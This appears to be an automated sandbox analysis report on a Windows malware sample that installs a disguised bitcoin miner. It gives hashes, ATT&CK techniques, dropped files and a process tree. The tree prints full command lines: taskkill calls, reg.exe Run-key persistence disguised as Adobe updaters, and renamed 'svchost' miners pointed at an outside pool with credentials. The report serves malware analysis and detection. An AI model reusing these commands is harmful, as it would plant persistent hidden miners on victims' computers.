b742c39d90817e9a1c4793d48447a467a9effe1f249d6018a7e83ab7b968ea7f

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
19/07/2024, 00:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe
Size

830KB
MD5

59b893f989445ddfd504763e68ffb196
SHA1

0c8e0f030a9764f2a4911e73fbebe0685cd74b1c
SHA256

b742c39d90817e9a1c4793d48447a467a9effe1f249d6018a7e83ab7b968ea7f
SHA512

83828595799b7e935e695d3781ad624ef3103dd68b6ec6360cd1200b399b094bd13d1a00c59c443eb73d7be9acf064202e95f6b2c5bc1e3bfb1150291ff6318f
SSDEEP

24576:PxaVxr52bRnRruUsrcQYP9TG3mIMmIUBELwwW/4AhccC:Pnlsrc7GZCEXnccC

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation	59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation	j.exe

Executes dropped EXE 4 IoCs

pid	Process
2812	j.exe
3088	svchost.exe
4624	rundll32.exe
5048	svchost2.exe

Loads dropped DLL 5 IoCs

pid	Process
3088	svchost.exe
3088	svchost.exe
3088	svchost.exe
3088	svchost.exe
3088	svchost.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobeupdate = "\"C:\\Users\\Admin\\AppData\\Roaming\\3 4\\l3.lnk\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobeupdater = "\"C:\\Users\\Admin\\AppData\\Roaming\\3 4\\rundll32.exe\""	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 3 IoCs

evasion

pid	Process
1720	taskkill.exe
4040	taskkill.exe
3624	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
5048	reg.exe
1868	reg.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3624	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	4040	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4624	rundll32.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 1124 wrote to memory of 880	1124	59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe	87
PID 1124 wrote to memory of 880	1124	59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe	87
PID 1124 wrote to memory of 880	1124	59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe	87
PID 880 wrote to memory of 3624	880	cmd.exe	90
PID 880 wrote to memory of 3624	880	cmd.exe	90
PID 880 wrote to memory of 3624	880	cmd.exe	90
PID 880 wrote to memory of 1720	880	cmd.exe	92
PID 880 wrote to memory of 1720	880	cmd.exe	92
PID 880 wrote to memory of 1720	880	cmd.exe	92
PID 880 wrote to memory of 4040	880	cmd.exe	93
PID 880 wrote to memory of 4040	880	cmd.exe	93
PID 880 wrote to memory of 4040	880	cmd.exe	93
PID 880 wrote to memory of 5048	880	cmd.exe	94
PID 880 wrote to memory of 5048	880	cmd.exe	94
PID 880 wrote to memory of 5048	880	cmd.exe	94
PID 880 wrote to memory of 1868	880	cmd.exe	95
PID 880 wrote to memory of 1868	880	cmd.exe	95
PID 880 wrote to memory of 1868	880	cmd.exe	95
PID 1124 wrote to memory of 2812	1124	59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe	97
PID 1124 wrote to memory of 2812	1124	59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe	97
PID 1124 wrote to memory of 2812	1124	59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe	97
PID 2812 wrote to memory of 3088	2812	j.exe	99
PID 2812 wrote to memory of 3088	2812	j.exe	99
PID 2812 wrote to memory of 3088	2812	j.exe	99
PID 1124 wrote to memory of 4624	1124	59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe	103
PID 1124 wrote to memory of 4624	1124	59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe	103
PID 1124 wrote to memory of 4624	1124	59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe	103
PID 4624 wrote to memory of 5048	4624	rundll32.exe	119
PID 4624 wrote to memory of 5048	4624	rundll32.exe	119
PID 4624 wrote to memory of 5048	4624	rundll32.exe	119

C:\Users\Admin\AppData\Local\Temp\59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\59b893f989445ddfd504763e68ffb196_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\3 4\bat.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:880
- - C:\Windows\SysWOW64\taskkill.exe
    C:\Windows\system32\taskkill.exe /im svchost.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3624
- - C:\Windows\SysWOW64\taskkill.exe
    C:\Windows\system32\taskkill.exe /im rundll32.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1720
- - C:\Windows\SysWOW64\taskkill.exe
    C:\Windows\system32\taskkill.exe /im svchost2.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4040
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v adobeupdate /d "\"C:\Users\Admin\AppData\Roaming\3 4\l3.lnk\"" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:5048
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v adobeupdater /d "\"C:\Users\Admin\AppData\Roaming\3 4\rundll32.exe\"" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1868
- C:\Users\Admin\AppData\Roaming\3 4\j.exe
  "C:\Users\Admin\AppData\Roaming\3 4\j.exe" "C:\Users\Admin\AppData\Roaming\3 4\svchost.exe" -o http://us2.eclipsemc.com:8337 -u antraxo_bitcoin -p oliver90
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Users\Admin\AppData\Roaming\3 4\svchost.exe
    "C:\Users\Admin\AppData\Roaming\3 4\svchost.exe" "-o" "http://us2.eclipsemc.com:8337" "-u" "antraxo_bitcoin" "-p" "oliver90"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3088
- C:\Users\Admin\AppData\Roaming\3 4\rundll32.exe
  "C:\Users\Admin\AppData\Roaming\3 4\rundll32.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4624
- - C:\Users\Admin\AppData\Roaming\3 4\svchost2.exe
    svchost2.exe -o http://us2.eclipsemc.com:8337 -u antraxo_bitcoin -p oliver90
    3⤵
    - Executes dropped EXE
    PID:5048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\3 4\OpenCL.dll

Filesize
50KB

MD5
6c5bde40d18116e6c592506a51e014da

SHA1
2afcec48a0453c9e8b699b70da0b7b323882cc7d

SHA256
5e37f84046c38b34fd45a7c3f62c68984fb61ebc02d57f878f17a8d97750c6b6

SHA512
a5d41a6575c3b86e07a48422378106970640b1ea6e8ee0426a0c4e7d79320626e14bc3c984376f4890ad2b8e77d17497b6d3592190a7691d31a4f724647e8131

Download Submit
C:\Users\Admin\AppData\Roaming\3 4\bat.bat

Filesize
422B

MD5
abfb0e2c9932da7ccf503a62971d131c

SHA1
b25970910714c878cd5483ba047c5b2a1c422918

SHA256
52990bbf68ab9ca31ca3365ec168b8bc0a328b7a023bbe3e09737412ab041b84

SHA512
c84e89da085f2c8dcd103ac4bb32a49286dfbdd26df855ab216af9b1632283c596803dbc2552c52e90653bb02a5f0ffe93110e32954ac0ca2ce54cd729c76be8

Download Submit
C:\Users\Admin\AppData\Roaming\3 4\j.exe

Filesize
136KB

MD5
935809d393a2bf9f0e886a41ff5b98be

SHA1
1ed3fc1669115b309624480e88c924b7b67e73bb

SHA256
c92904610319843578ada35fb483d219b0d07da69179d57c7e1223cab078492c

SHA512
46bccaaba4b8b4cfa247f48b55998d13b37f714ac69f6b08a97b6b8075f61233545406bc9f8db7d2848f1831eeb506da650b72d7d3a2f624e51eccd5fc537bc5

Download Submit
C:\Users\Admin\AppData\Roaming\3 4\libcurl-4.dll

Filesize
243KB

MD5
7fef219621cd9717a1d7fcc537dc9fbe

SHA1
5ddf874d9c0186827661847b328f531957ff4eb3

SHA256
f23d2abf2c96813054df51212f74fabbbb2d707a6b477cb2cf1d52d316a26302

SHA512
b568820fbda0fa638c844285c585848b1d62623ab40b2b12215afe44552099ce085c33429b71c256433bcfabecbb22da61c99c9c8eacc9e10940479a93c99c82

Download Submit
C:\Users\Admin\AppData\Roaming\3 4\libpdcurses.dll

Filesize
85KB

MD5
1b364ec27b6f4f8879dabadb096a4f64

SHA1
1306650116ed181165d8cbc4098b07c0b08fcd09

SHA256
94995b0560d2ccda7951252397eb152b499454746b75d03479bbfa551def41e4

SHA512
bc7232055b0bd65c92197898b4eef3a6e92e6e8b55280a9f971d7bb147057800c9bc980dd9f10ec155ccf153679d55df3a3997ced04bf1d35d4e6376764e2dbc

Download Submit
C:\Users\Admin\AppData\Roaming\3 4\libusb-1.0.dll

Filesize
173KB

MD5
7f2523dec5fa92c70f3ab13765d799ff

SHA1
f94a6cc07fa8aa680e3776df30e5171ce884fd0e

SHA256
7ceb91390ac581b78be8a18a6eebf7f9124a2460c4f9849ee4c75ec303412062

SHA512
33190cab913efaa7903b1cf1c9525bc2688cc7f954289bd2776e0bf141e4a78fd4f34cf0242e4da8ef30c3c6816da7d22573f645caa3b26571b9bd900dd31a37

Download Submit
C:\Users\Admin\AppData\Roaming\3 4\pthreadGC2.dll

Filesize
66KB

MD5
8bc13c002f91cff22a17f5a5191c1292

SHA1
113b3d47ce52fd13e0c8038257c3ae05f3a1a9ff

SHA256
97c1a2cabfe69b987732a1502dac6cce9c6e31f6f7e9142fc4bc8d92077f2da3

SHA512
e78a607c48e1ff1362aadf298f679f716e0f8ded48cd4b835fe688a9f8cdb4ce8b227c2b71b78826f10285302d414b64082bf500ef471f1342bd4bc7f87e8033

Download Submit
C:\Users\Admin\AppData\Roaming\3 4\rundll32.exe

Filesize
24KB

MD5
c3f625470fd98ab3740f9f465529bbaa

SHA1
377adb646d557d8053528bbe024a1cec0f2ed8cb

SHA256
12778c37fed201a94fcf8b9490a0321f31df9dce0c4acb5182f6c07d8120852e

SHA512
94520aa89b30272d7213381e2b94ca1b853c124df396cdb77e0bc13e30807162fd39d95dd581c04f8a5c846a913d847c1f3011cfc7b2fd856c1bad1bf859ce74

Download Submit
C:\Users\Admin\AppData\Roaming\3 4\settings.txt

Filesize
84B

MD5
fc13809c8618cdb82c8846705b91fda7

SHA1
b0fa5d2cd742b89a5547deb3cd400673ae09e517

SHA256
52df75235ee1ef84eea2baaf4c5fc937f43ad5a56fe0d3ce5bc832046cf40d58

SHA512
4f5d637f3022e1bd1b9e5b95ec3dfcd379a47dfcb9d22d9f52c51cb57a384bc7e317b4c9990c4c5c80ca2257685c9f16b50248264271cb69a0627e7bff639a84

Download Submit
C:\Users\Admin\AppData\Roaming\3 4\svchost.exe

Filesize
283KB

MD5
01aa8f9282d12692a24ffd7d0dbb82cd

SHA1
290516f14eefff17ccbfaf756ba5c725f6adbccb

SHA256
c5cc8b958a2a2943561f1d9800b0d86ea7d0b7cc40ea78557257d551abf3f650

SHA512
15e1da68743ae086795d84c5a16c23dbafbf222e26ae504c2b0d86d5bdc9c20c1f61b7bcf789718b473e55907b0d969402d8169d9c3ae661e0f6471df4bdd354

Download Submit
C:\Users\Admin\AppData\Roaming\3 4\svchost2.exe

Filesize
924KB

MD5
a472268bb5c36f23eb3581de3c2d128c

SHA1
7dbab83d16124a2688ad7e5450729f8e5b99b5a5

SHA256
cfae46e3e982cab65f53bcb6a3ccdc8167c608950fdde5e674e582c8f2ac9c57

SHA512
68cff747d029eb80ad0aa9d480fbc13c5fdd5009d244d725dd86f134147bd193a446a022749f54d251b10755eab634346f2c375438e88f4749d9a58e33a66697

Download Submit
memory/2812-66-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3088-92-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-86-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-84-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-83-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-82-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-81-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-79-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-78-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-77-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-91-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-80-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-85-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-87-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-93-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-97-0x000000006B600000-0x000000006B62F000-memory.dmp

Filesize
188KB

Download
memory/3088-96-0x0000000062480000-0x0000000062499000-memory.dmp

Filesize
100KB

Download
memory/3088-94-0x0000000062200000-0x000000006221C000-memory.dmp

Filesize
112KB

Download
memory/3088-95-0x0000000070800000-0x0000000070844000-memory.dmp

Filesize
272KB

Download
memory/3088-88-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-90-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download
memory/3088-89-0x0000000000400000-0x0000000000451000-memory.dmp

Filesize
324KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads